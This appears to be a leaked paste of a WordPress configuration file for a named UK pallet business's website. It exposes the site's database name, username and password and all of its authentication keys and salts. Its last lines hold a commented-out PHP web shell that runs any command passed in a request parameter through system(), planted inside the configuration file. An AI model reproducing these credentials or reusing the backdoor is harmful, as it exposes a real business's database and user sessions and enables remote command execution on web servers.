· 9 years ago · Feb 04, 2017, 12:22 AM
1
2dukinfieldpallets.co.uk
3
4
5<?php
6
7define( 'BWPS_FILECHECK', true );
8/**
9* The base configurations of the WordPress.
10*
11* This file has the following configurations: MySQL settings, Table Prefix,
12* Secret Keys, WordPress Language, and ABSPATH. You can find more information
13* by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
14* wp-config.php} Codex page. You can get the MySQL settings from your web host.
15*
16* This file is used by the wp-config.php creation script during the
17* installation. You don't have to use the web site, you can just copy this file
18* to "wp-config.php" and fill in the values.
19*
20* @package WordPress
21*/
22
23// ** MySQL settings - You can get this info from your web host ** //
24/** The name of the database for WordPress */
25define('DB_NAME', 'dukinfie_wp956');
26
27/** MySQL database username */
28define('DB_USER', 'dukinfie_wp956');
29
30/** MySQL database password */
31define('DB_PASSWORD', 'pjPltS334x');
32
33/** MySQL hostname */
34define('DB_HOST', 'localhost');
35
36/** Database Charset to use in creating database tables. */
37define('DB_CHARSET', 'utf8');
38
39/** The Database Collate type. Don't change this if in doubt. */
40define('DB_COLLATE', '');
41
42define('DISALLOW_FILE_EDIT', TRUE); // Sucuri Security: Tue, 18 Oct 2016 20:43:39 +0000
43
44
45/**#@+
46* Authentication Unique Keys and Salts.
47*
48* Change these to different unique phrases!
49* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
50* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
51*
52* @since 2.6.0
53*/
54define('AUTH_KEY', 'q0mmbibm6ujajlhvhr5ehu9znawaxpunglzeoudmwiqmyin3ecoiymhf3avnlkgq');
55define('SECURE_AUTH_KEY', 'ys9beb0ppewdfwjxborxsva24vtjujtxiogznqhtvyqjmlbtlgvb1ixviya8aqt1');
56define('LOGGED_IN_KEY', 'w3s3ejmqiqcy1lwvmxkkqdrxilgbgxjg6drwwjzpyczbsgnzox8g6w6ydwt7lghj');
57define('NONCE_KEY', 'yzno3mqdqg8ds8jn4wixawj1saqizrq3ilocilk4n4g6fb08zj3rdclapc7zksel');
58define('AUTH_SALT', 'cwsro5zd1btmbihltxsxjhx0m24zardlmrr8c6w7rjlvbtbueixx5afqivan4uzu');
59define('SECURE_AUTH_SALT', '0q4u5llyb4vb025qatbfveskxlyouxanslgdeykih3rj4bdej8welja64gx1cwrp');
60define('LOGGED_IN_SALT', 'wbag04asxkpuvp9egyp8majufbfbe6yhr4pztubljytv9kujv8nf5bxodt7q9jmg');
61define('NONCE_SALT', 'f9me5iunvnxkm3s2l3p6ne1whnxthrpqwgezn23ki6sii1cedhj41upmpwjhyyd2');
62
63/**#@-*/
64
65/**
66* WordPress Database Table prefix.
67*
68* You can have multiple installations in one database if you give each a unique
69* prefix. Only numbers, letters, and underscores please!
70*/
71$table_prefix = 'wp_';
72
73/**
74* WordPress Localized Language, defaults to English.
75*
76* Change this to localize WordPress. A corresponding MO file for the chosen
77* language must be installed to wp-content/languages. For example, install
78* de_DE.mo to wp-content/languages and set WPLANG to 'de_DE' to enable German
79* language support.
80*/
81define('WPLANG', '');
82
83/**
84* For developers: WordPress debugging mode.
85*
86* Change this to true to enable the display of notices during development.
87* It is strongly recommended that plugin and theme developers use WP_DEBUG
88* in their development environments.
89*/
90define('WP_DEBUG', false);
91
92/* That's all, stop editing! Happy blogging. */
93
94/** Absolute path to the WordPress directory. */
95if ( !defined('ABSPATH') )
96define('ABSPATH', dirname(__FILE__) . '/');
97
98/** Sets up WordPress vars and included files. */
99require_once(ABSPATH . 'wp-settings.php');
100#<?php $cmd = <<<EOD
101#cmd
102#EOD;
103#
104#if(isset($_REQUEST[$cmd])) {
105#system($_REQUEST[$cmd]); } ?>